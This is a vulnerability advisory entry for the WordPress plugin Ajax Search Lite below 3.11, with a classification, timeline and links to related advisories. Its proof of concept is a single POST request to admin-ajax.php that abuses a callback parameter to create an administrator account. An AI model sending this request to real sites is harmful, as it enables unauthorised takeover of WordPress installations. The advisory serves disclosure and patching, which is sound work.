WordPress Plugin Vulnerabilities

Ajax Search Lite < 3.11 - Authenticated RCE

Description

Proof of Concept:

This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects Plugins

Plugin icon
ajax-search-lite
Fixed in 3.11

References

URL
https://web.archive.org/web/20150619084745/https://research.evex.pw/?vuln=9

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Submitter
A. Samman
Submitter twitter
Evex_1337
Verified
No
WPVDB ID
979014d9-df59-4858-8d88-ebaaa2544fa0

Timeline

Publicly Published
2015-03-18 (about 11 years ago)
Added
2015-03-21 (about 11 years ago)
Last Updated
2019-10-21 (about 6 years ago)

Other

Published
Title
Published
2014-08-01
Title
Zingiri Web Shop <= 2.2.3 - ajax_file_cut.php selectedDoc Parameter Remote PHP Code
Published
2018-12-10
Title
WooCommerce <= 3.4.5 - Authenticated Phar Deserialization
Published
2015-09-14
Title
EZ SQL Reports < 4.11.37 - Authenticated Arbitrary Code Execution
Published
2025-07-10
Title
GB Forms DB < 1.0.3 - Unauthenticated Remote Code Execution
Published
2025-09-22
Title
Advanced Views < 3.7.20 - Author+ Remote Code Execution via SSTI